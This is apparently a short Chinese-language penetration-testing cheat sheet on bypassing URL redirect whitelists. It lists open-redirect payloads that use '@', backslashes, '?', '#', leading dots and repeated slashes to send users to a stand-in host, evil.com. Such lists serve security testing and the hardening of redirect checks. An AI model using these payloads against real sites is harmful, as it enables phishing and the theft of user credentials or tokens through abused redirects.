url重定向绕过方式

URL跳转绕过姿势

# "@"
http://www.target.com/redirecturl=http://whitelist.com@evil.com

# "\"
http://www.target.com/redirecturl=http://evil.com\a.whitelist.com

# "\\"
http://www.target.com/redirecturl=http://evil.com\\a.whitelist.com

# "?"
http://www.target.com/redirecturl=http://evil.com?a.whitelist.com

# "#"
http://www.target.com/redirecturl=http://evil.com#a.whitelist.com

# "?"
https://www.landgrey.me/redirect.php?url=https://www.evil.com?www.landgrey.me

# "."
https://www.landgrey.me/redirect.php?url=.evil           (可能会跳转到www.landgrey.me.evil域名) 
https://www.landgrey.me/redirect.php?url=.evil.com       (可能会跳转到evil.com域名)

# 重复特殊字符绕过 
https://www.landgrey.me/redirect.php?url=///www.evil.com//.. 
https://www.landgrey.me/redirect.php?url=www.evil.com//..

你可能感兴趣的:(渗透测试)